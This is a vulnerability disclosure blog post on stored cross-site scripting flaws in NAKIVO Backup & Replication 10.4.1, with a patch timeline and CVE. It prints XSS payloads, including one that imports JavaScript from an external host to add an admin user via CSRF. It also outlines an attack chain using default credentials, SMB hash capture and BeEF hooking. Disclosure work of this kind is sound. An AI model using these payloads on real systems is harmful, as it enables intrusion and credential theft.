Nakivo Stored XSS

22 Jun 2022 in General

While reviewing the security of a product marketed as a “Ransomware Protection and Recovery” solution, I discovered multiple stored Cross-Site Scripting (XSS) vulnerabilities in NAKIVO Backup & Replication version 10.4.1 (build 59587 from 21 Oct 2021). These vulnerabilities could allow malicious JavaScript to be executed by anyone who authenticates to the web application. The attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user.

NAKIVO Backup & Replication offers backup, replication, failover, backup to cloud, backup to tape, backup copy, backup data reduction, instant verification, granular restore and disaster recovery orchestration for virtual, physical, cloud and SaaS environments - all in one convenient web interface. (NAKIVO, 2021)

Authenticated access is required to exploit the vulnerability or to be exploited. An assumption would be that only trusted system administrators would have access to the application and a valid question would be, “Why would a trusted admin exploit other administrators?” The application can be installed by importing a virtual machine from an Open Virtual Appliance (OVA) file into VMWare. The VMWare virtual machine ships with a default root password. Anyone with the root password can reset any application user’s password to gain access to that application. Additionally, when the application is deployed using an Amazon Web Services (AWS) Amazon Machine Image (AMI), the default application admin password is the machine’s ID.

An attack chain on a NAKIVO Backup and Replication virtual machine using default credentials may look something like this: The malicious actor gains access to the internal corporate network via a phishing attack, or a malicious insider is looking for a path to escalate their privileges. After discovering the system is using default credentials, a logical first step would be to use their root access to download hacking tools and host payloads for use in lateral movement. How would a hacker then use this system as a springboard to attack other users/systems?

A malicious actor who discovers a NAKIVO Backup and Replication virtual machine, which is using default credentials can reset passwords without requiring access to the user’s email. (NAKIVO, 2021) A hacker with access to a valid account can use their XSS payloads to embed an SMB image tag which captures, cracks, or relays the victim’s Windows password hash, or that hooks the victim’s browser using the Browser Exploitation Framework (BeEF).

Vulnerability Details

Stored XSS in Manage Credentials ‘description’ POST parameter

OWASP’s definition of XSS is: “Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.” (OWASP, 2021) It was observed that the

The XSS alert was triggered when viewing ‘Manage Credentials’:

Alert popups triggered from XSS payloads are a great initial indication that an XSS vulnerability has been identified. However, a popup does not fully communicate the risk. Once a popup is triggered, it’s always best to put more effort into discovering the full impact. For example, can you add an admin user, capture session cookies, or access sensitive information? Do any application client or server-side controls or limitations prevent carrying out an attack beyond just displaying an alert popup? Can you create a payload which parses Cross Site Request Forgery (CSRF) tokens and then include them in a successful CSRF attack?

To explore the possible attack vectors beyond simple alert popups, a payload was developed which successfully added a new administrative user. The payload was changed to ‘<img src=foo onerror=import(‘https://[redacted]/test.js’) />’. The test .js file was hosted on an external domain and contained a function to perform CSRF to add a new user. After submitting the payload and refreshing the page, a new user displays within the console:

Stored XSS in Bandwidth Throttling Rule ‘name’ parameter

A new Bandwidth Throttling Rule was created with a payload of ‘<img src=foo onerror=alert(9) />’ using the ‘Name’ field as follows:

The XSS alert was triggered when removing the rule as follows:

Timeline

11/19/2021: Disclosure to NAKIVO IT Security

11/30/2021: NAKIVO released version 10.5.0.60727 to patch the vulnerabilities.

01/18/2022: MITRE assigned CVE ID CVE-2022-23436

References

NAKIVO. (2021, November 30). Logging in to NAKIVO Backup and Replication. Retrieved from Home: https://helpcenter.nakivo.com/User-Guide/Content/Getting-Started/Logging-in-to-NAKIVO-Backup-and-Replication.htm

NAKIVO. (2021, 12 07). NAKIVO Backup and Replication Overview. Retrieved from Home: https://helpcenter.nakivo.com/User-Guide/Content/Overview/Overview.htm

OWASP. (2021, November 30). Cross Site Scripting (XSS) Software Attack

OWASP Foundation. Retrieved from OWASP Foundation: https://owasp.org/www-community/attacks/xss/